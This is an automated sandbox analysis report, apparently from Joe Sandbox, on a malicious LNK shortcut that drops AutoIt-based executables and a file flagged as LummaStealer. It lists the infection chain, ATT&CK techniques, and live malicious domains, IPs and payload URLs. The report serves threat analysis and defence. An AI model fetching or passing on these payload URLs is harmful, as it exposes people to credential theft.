Source: powershell.exe, 00000012.00000002.2020537958.000002DA80408000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Public\Guard.exe
Source: powershell.exe, 00000012.00000002.2220188721.000002DAE866A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2225326602.000002DAE8954000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000014.00000003.1992534079.0000000004A31000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000014.00000003.1993464086.0000000004B30000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 00000014.00000003.1983295671.0000000004B30000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 00000014.00000003.1993149407.0000000004B30000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 00000014.00000003.1992862331.0000000004B30000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 00000014.00000003.1987464438.0000000004B30000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 00000014.00000003.1993002491.0000000004B30000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 00000014.00000003.1993266388.0000000004B30000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 00000014.00000003.1975920412.0000000004B30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Guard.exe
Source: powershell.exe, 00000012.00000002.2220188721.000002DAE8614000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 2C:\Users\Public\Guard.exe
Source: PefjSkkhb.exe, 0000000A.00000002.1915362734.000001CB92638000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2220188721.000002DAE866A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2020537958.000002DA80227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2225326602.000002DAE8920000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2020537958.000002DA80408000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2220188721.000002DAE8614000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2214222334.000002DAE66B6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2220188721.000002DAE85D0000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, Guard.exe, 00000014.00000002.2933482565.0000000000BCF000.00000004.00000010.00020000.00000000.sdmp, Guard.exe, 00000014.00000002.2933482565.0000000000BBE000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: C:\Users\Public\Guard.exe
Source: powershell.exe, 00000012.00000002.2020537958.000002DA80408000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \Users\Public\Guard.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 Blob
Source: SwiftWrite.pifBinary or memory string: WIN_81
Source: SwiftWrite.pifBinary or memory string: WIN_XP
Source: SwiftWrite.pifBinary or memory string: WIN_XPe
Source: SwiftWrite.pifBinary or memory string: WIN_VISTA
Source: PefjSkkhb.exe.5.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
Source: SwiftWrite.pifBinary or memory string: WIN_7
Source: SwiftWrite.pifBinary or memory string: WIN_8
Source: SwiftWrite.pif, 00000018.00000000.2142492621.0000000000A76000.00000002.00000001.01000000.00000010.sdmpBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 3USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F904074 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,10_2_00007FF79F904074
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F903940 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,10_2_00007FF79F903940
Source: C:\Users\Public\Guard.exeCode function: 20_2_00F2696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,20_2_00F2696E
Source: C:\Users\Public\Guard.exeCode function: 20_2_00F26E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,20_2_00F26E32
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_00A3696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,24_2_00A3696E
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_00A36E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,24_2_00A36E32

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting		2
Valid Accounts		2
Native API		1
Scripting		1
Exploitation for Privilege Escalation		2
Disable or Modify Tools		21
Input Capture		2
System Time Discovery		Remote Services1
Archive Collected Data		12
Ingress Tool Transfer		Exfiltration Over Other Network Medium1
System Shutdown/Reboot
CredentialsDomainsDefault Accounts2
Command and Scripting Interpreter		1
DLL Side-Loading		1
DLL Side-Loading		1
Deobfuscate/Decode Files or Information		LSASS Memory1
Account Discovery		Remote Desktop Protocol1
Email Collection		11
Encrypted Channel		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts3
PowerShell		2
Valid Accounts		2
Valid Accounts		2
Obfuscated Files or Information		Security Account Manager2
File and Directory Discovery		SMB/Windows Admin Shares21
Input Capture		2
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCron2
Registry Run Keys / Startup Folder		21
Access Token Manipulation		1
DLL Side-Loading		NTDS37
System Information Discovery		Distributed Component Object Model3
Clipboard Data		23
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script12
Process Injection		231
Masquerading		LSA Secrets151
Security Software Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts2
Registry Run Keys / Startup Folder		2
Valid Accounts		Cached Domain Credentials31
Virtualization/Sandbox Evasion		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
Virtualization/Sandbox Evasion		DCSync13
Process Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
Access Token Manipulation		Proc Filesystem11
Application Window Discovery		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt12
Process Injection		/etc/passwd and /etc/shadow1
System Owner/User Discovery		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1577880 Sample: R8CAg00Db8.lnk Startdate: 18/12/2024 Architecture: WINDOWS Score: 100 87 tiffany-careers.com 2->87 89 x1.i.lencr.org 2->89 91 2 other IPs or domains 2->91 97 Malicious sample detected (through community Yara rule) 2->97 99 Windows shortcut file (LNK) starts blacklisted processes 2->99 101 Multi AV Scanner detection for dropped file 2->101 103 14 other signatures 2->103 14 forfiles.exe 1 2->14         started        17 wscript.exe 2->17         started        19 svchost.exe 1 1 2->19         started        signatures3 process4 dnsIp5 125 Windows shortcut file (LNK) starts blacklisted processes 14->125 22 powershell.exe 7 14->22         started        25 conhost.exe 1 14->25         started        127 Windows Scripting host queries suspicious COM object (likely to drop second stage) 17->127 27 SwiftWrite.pif 17->27         started        93 127.0.0.1 unknown unknown 19->93 signatures6 process7 signatures8 107 Windows shortcut file (LNK) starts blacklisted processes 22->107 109 Drops PE files to the user root directory 22->109 111 Powershell drops PE file 22->111 29 mshta.exe 17 22->29         started        process9 dnsIp10 95 tiffany-careers.com 147.45.49.155, 443, 49730, 49733 FREE-NET-ASFREEnetEU Russian Federation 29->95 79 C:\Users\user\AppData\Local\...\ghep1[1], PE32 29->79 dropped 129 Windows shortcut file (LNK) starts blacklisted processes 29->129 131 Suspicious powershell command line found 29->131 34 powershell.exe 17 18 29->34         started        file11 signatures12 process13 file14 71 C:\Users\user\AppData\Roaming\PefjSkkhb.exe, PE32+ 34->71 dropped 105 Binary is likely a compiled AutoIt script file 34->105 38 PefjSkkhb.exe 34->38         started        42 Acrobat.exe 81 34->42         started        44 conhost.exe 34->44         started        signatures15 process16 file17 73 C:\Users\Public\PublicProfile.ps1, ASCII 38->73 dropped 113 Windows shortcut file (LNK) starts blacklisted processes 38->113 115 Multi AV Scanner detection for dropped file 38->115 117 Suspicious powershell command line found 38->117 119 2 other signatures 38->119 46 powershell.exe 38->46         started        49 powershell.exe 38->49         started        52 AcroCEF.exe 107 42->52         started        signatures18 process19 dnsIp20 81 C:\Users\Public\Secure.au3, Unicode 46->81 dropped 54 Guard.exe 46->54         started        58 conhost.exe 46->58         started        85 139.99.188.124, 49744, 49753, 80 OVHFR Canada 49->85 83 C:\Users\Publicbehaviorgraphuard.exe, PE32 49->83 dropped 60 conhost.exe 49->60         started        62 AcroCEF.exe 52->62         started        file21 process22 file23 75 C:\Users\user\AppData\...\SwiftWrite.pif, PE32 54->75 dropped 77 C:\Users\user\AppData\Local\...\SwiftWrite.js, ASCII 54->77 dropped 121 Windows shortcut file (LNK) starts blacklisted processes 54->121 123 Drops PE files with a suspicious file extension 54->123 64 cmd.exe 54->64         started        signatures24 process25 file26 69 C:\Users\user\AppData\...\SwiftWrite.url, MS 64->69 dropped 67 conhost.exe 64->67         started        process27

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
R8CAg00Db8.lnk21%ReversingLabsWin32.Trojan.ForExec

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\Public\Guard.exe8%ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\ghep1[1]39%ReversingLabsWin32.Trojan.LummaStealer
C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif8%ReversingLabs
C:\Users\user\AppData\Roaming\PefjSkkhb.exe32%ReversingLabsWin32.Exploit.Generic

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://tiffany-careers.com/ghep1u0%Avira URL Cloudsafe
https://tiffany-careers.com/ghep10%Avira URL Cloudsafe
https://tiffany-careers.com/ghep1LMEMH0%Avira URL Cloudsafe
https://tiffany-careers.com/ghep1v0%Avira URL Cloudsafe
http://tiffany-careers.com/Marketing.pdf0%Avira URL Cloudsafe
http://tiffany-careers.com/PefjSkkhb.exep0%Avira URL Cloudsafe
https://tiffany-careers.com/ghep1NNC:0%Avira URL Cloudsafe
http://139.99.188.124/kiiMf0%Avira URL Cloudsafe
https://tiffany-careers.com/ghep1S-0%Avira URL Cloudsafe
http://tiffany-careers.com/Marketing.pdf00%Avira URL Cloudsafe
https://tiffany-careers.com/ghep1https://tiffany-careers.com/ghep10%Avira URL Cloudsafe
https://tiffany-careers.com/ghep1...t0%Avira URL Cloudsafe
https://tiffany-careers.com/ghep1$global:?0%Avira URL Cloudsafe
http://139.99.H0%Avira URL Cloudsafe
https://tiffany-careers.com/0%Avira URL Cloudsafe
https://tiffany-careers.com/ghep1C0%Avira URL Cloudsafe
https://tiffany-careers.com/ghep1GI90%Avira URL Cloudsafe
https://tiffany-careers.com/ghep1=0%Avira URL Cloudsafe
https://tiffany-careers.com/ghep1B0%Avira URL Cloudsafe
https://tiffany-careers.com/ghep1H0%Avira URL Cloudsafe
https://tiffany-careers.com/ghep1)0%Avira URL Cloudsafe
https://tiffany-careers.com/ghep180%Avira URL Cloudsafe
https://tiffany-careers.com/ghep1CC0%Avira URL Cloudsafe
http://139.99.188.124/QWCheljD.txt0%Avira URL Cloudsafe
https://tiffany-careers.com/ghep1...0%Avira URL Cloudsafe
https://tiffany-careers.com/ghep12C0%Avira URL Cloudsafe
http://tiffany-careers.com0%Avira URL Cloudsafe
https://tiffany-careers.com/ghep1C:0%Avira URL Cloudsafe
https://tiffany-careers.com/ghep1ProgramW640%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
bg.microsoft.map.fastly.net
199.232.214.172
truefalse
    		high
    tiffany-careers.com
    		147.45.49.155
    		truetrue
      		unknown
      x1.i.lencr.org
      		unknown
      		unknownfalse
        		high
        nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs
        		unknown
        		unknownfalse
          		high

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          http://tiffany-careers.com/Marketing.pdffalse
          • Avira URL Cloud: safe
          		unknown
          http://139.99.188.124/kiiMftrue
          • Avira URL Cloud: safe
          		unknown
          https://tiffany-careers.com/ghep1true
          • Avira URL Cloud: safe
          		unknown
          http://139.99.188.124/QWCheljD.txttrue
          • Avira URL Cloud: safe
          		unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          https://tiffany-careers.com/ghep1LMEMHmshta.exe, 00000003.00000002.1965775429.000002B3055CA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1955152490.000002B3055CA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1948185973.000002B3055CA000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://tiffany-careers.com/Marketing.pdf0powershell.exe, 00000005.00000002.1851770246.000001DB4CFEA000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://tiffany-careers.com/PefjSkkhb.exeppowershell.exe, 00000005.00000002.1851770246.000001DB4D25C000.00000004.00000800.00020000.00000000.sdmptrue
          • Avira URL Cloud: safe
          		unknown
          https://contoso.com/Licensepowershell.exe, 00000012.00000002.2144003555.000002DA90077000.00000004.00000800.00020000.00000000.sdmpfalse
            		high
            https://tiffany-careers.com/ghep1NNC:mshta.exe, 00000003.00000003.1948749602.000002B37DB62000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://g.live.com/odclientsettings/ProdV2.C:svchost.exe, 00000004.00000003.1737447900.000001CA45653000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1737447900.000001CA456B7000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.drfalse
              		high
              https://tiffany-careers.com/ghep1S-forfiles.exe, 00000000.00000002.1706444973.0000019D3D5F0000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://www.autoitscript.com/autoit3/Guard.exe, 00000014.00000002.2939514467.0000000003FF7000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000014.00000003.1997962560.0000000004CEC000.00000004.00000020.00020000.00000000.sdmpfalse
                		high
                https://g.live.com/odclientsettings/Prod.C:svchost.exe, 00000004.00000003.1737447900.000001CA45606000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.drfalse
                  		high
                  https://tiffany-careers.com/ghep1umshta.exe, 00000003.00000003.1965170677.000002B37DB10000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1947805084.000002B37DB0C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1956177042.000002B37DB0D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1966235459.000002B37DB13000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://tiffany-careers.com/ghep1vmshta.exe, 00000003.00000002.1966105858.000002B37DADE000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://tiffany-careers.com/ghep1https://tiffany-careers.com/ghep1mshta.exe, 00000003.00000003.1957829727.000002B303025000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://g.live.com/odclientsettings/ProdV2svchost.exe, 00000004.00000003.1737447900.000001CA45672000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.drfalse
                    		high
                    https://contoso.com/powershell.exe, 00000012.00000002.2144003555.000002DA90077000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://nuget.org/nuget.exepowershell.exe, 00000005.00000002.1891591827.000001DB5CE31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2020537958.000002DA81904000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2144003555.000002DA90077000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://oneget.orgXpowershell.exe, 00000012.00000002.2020537958.000002DA81655000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://tiffany-careers.com/ghep1...tmshta.exe, 00000003.00000002.1966706556.000002BB7FCDF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1956325043.000002BB7FCDE000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://139.99.Hpowershell.exe, 00000012.00000002.2020537958.000002DA81145000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000005.00000002.1851770246.000001DB4CDC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2020537958.000002DA80001000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6svchost.exe, 00000004.00000003.1737447900.000001CA45672000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.drfalse
                              		high
                              https://tiffany-careers.com/ghep1GI9mshta.exe, 00000003.00000002.1966105858.000002B37DAD0000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.autoitscript.com/autoit3/JGuard.exe, 00000014.00000000.1974013134.0000000000F79000.00000002.00000001.01000000.0000000E.sdmp, Guard.exe, 00000014.00000003.1997962560.0000000004CEC000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif, 00000018.00000002.2933759546.0000000000A89000.00000002.00000001.01000000.00000010.sdmpfalse
                                		high
                                http://nuget.org/NuGet.exepowershell.exe, 00000005.00000002.1891591827.000001DB5CE31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2020537958.000002DA81904000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2144003555.000002DA90077000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000012.00000002.2020537958.000002DA81655000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://x1.i.lencr.org/2D85F72862B55C4EADD9E66E06947F3D0.8.drfalse
                                      		high
                                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000012.00000002.2020537958.000002DA8187D000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000012.00000002.2020537958.000002DA8187D000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://go.micropowershell.exe, 00000012.00000002.2020537958.000002DA81145000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://contoso.com/Iconpowershell.exe, 00000012.00000002.2144003555.000002DA90077000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://tiffany-careers.com/mshta.exe, 00000003.00000003.1947805084.000002B37DB43000.00000004.00000020.00020000.00000000.sdmptrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://crl.ver)svchost.exe, 00000004.00000002.2938459221.000001CA45800000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://tiffany-careers.com/ghep1$global:?powershell.exefalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://tiffany-careers.com/ghep1Hmshta.exe, 00000003.00000002.1966009295.000002B37DA70000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://tiffany-careers.com/ghep1Bmshta.exe, 00000003.00000002.1966503123.000002B37DCB0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://tiffany-careers.com/ghep1Cmshta.exe, 00000003.00000003.1965170677.000002B37DB10000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1947805084.000002B37DB0C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1956177042.000002B37DB0D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1966235459.000002B37DB13000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://tiffany-careers.com/ghep1=mshta.exe, 00000003.00000002.1965775429.000002B3055CA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1955152490.000002B3055CA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1948185973.000002B3055CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://github.com/Pester/Pesterpowershell.exe, 00000012.00000002.2020537958.000002DA8187D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://tiffany-careers.com/ghep18mshta.exe, 00000003.00000002.1966627930.000002BB7FCC1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96svchost.exe, 00000004.00000003.1737447900.000001CA45672000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://139.99.188.124powershell.exe, 00000012.00000002.2020537958.000002DA80227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2020537958.000002DA81145000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://tiffany-careers.com/ghep12Cmshta.exe, 00000003.00000003.1965266864.000002B37DAF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1966184314.000002B37DAF6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://tiffany-careers.com/ghep1...mshta.exe, 00000003.00000002.1966627930.000002BB7FCBD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://tiffany-careers.com/ghep1)mshta.exe, 00000003.00000002.1966105858.000002B37DADE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://tiffany-careers.com/ghep1C:forfiles.exe, 00000000.00000002.1706444973.0000019D3D5F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1957335691.000002B37DB95000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1965120480.000002B37DBA3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1948749602.000002B37DB95000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1966445570.000002B37DBA6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1947805084.000002B37DB95000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1966105858.000002B37DAD0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://aka.ms/pscore68powershell.exe, 00000005.00000002.1851770246.000001DB4CDC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2020537958.000002DA80001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://tiffany-careers.compowershell.exe, 00000005.00000002.1851770246.000001DB4CFEA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://tiffany-careers.com/ghep1CCmshta.exe, 00000003.00000003.1965266864.000002B37DAF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1966184314.000002B37DAF6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://tiffany-careers.com/ghep1ProgramW64forfiles.exe, 00000000.00000002.1706524188.0000019D3D7D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://oneget.orgpowershell.exe, 00000012.00000002.2020537958.000002DA81655000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high

                                                          World Map of Contacted IPs

                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs

                                                          Public IPs

                                                          IPDomainCountryFlagASNASN NameMalicious
                                                          139.99.188.124
                                                          		unknownCanada
                                                          		16276OVHFRtrue
                                                          147.45.49.155
                                                          		tiffany-careers.comRussian Federation
                                                          		2895FREE-NET-ASFREEnetEUtrue

                                                          Private

                                                          IP
                                                          127.0.0.1

                                                          General Information

                                                          Joe Sandbox version:41.0.0 Charoite
                                                          Analysis ID:1577880
                                                          Start date and time:2024-12-18 20:59:16 +01:00
                                                          Joe Sandbox product:CloudBasic
                                                          Overall analysis duration:0h 10m 8s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:full
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                          Number of analysed new started processes analysed:26
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:0
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Sample name:R8CAg00Db8.lnk
                                                          renamed because original name is a hash value
                                                          Original Sample Name:cdbfcc4d882ca6b35d7429cebc384245.lnk
                                                          Detection:MAL
                                                          Classification:mal100.expl.evad.winLNK@40/75@5/3
                                                          EGA Information:
                                                          • Successful, ratio: 50%
                                                          HCA Information:
                                                          • Successful, ratio: 99%
                                                          • Number of executed functions: 59
                                                          • Number of non-executed functions: 248
                                                          Cookbook Comments:
                                                          • Found application associated with file extension: .lnk

                                                          Warnings

                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                          • Excluded IPs from analysis (whitelisted): 23.36.245.152, 2.18.80.170, 23.32.239.9, 23.32.239.65, 2.19.198.16, 2.19.198.27, 2.19.198.10, 162.159.61.3, 172.64.41.3, 54.224.241.105, 18.213.11.84, 50.16.47.176, 34.237.241.83, 199.232.214.172, 23.192.153.142, 23.192.152.131, 2.19.198.17, 23.32.239.64, 2.19.198.8, 23.32.239.56, 23.32.239.10, 2.19.198.11, 23.32.239.74, 92.123.77.72, 2.19.195.9, 2.16.164.91, 2.16.164.112, 2.16.164.113, 23.32.239.57, 23.32.239.83, 23.32.239.66, 23.32.239.72, 23.32.239.58, 23.32.239.59, 23.32.239.80, 52.149.20.212, 3.219.243.226, 13.107.246.63
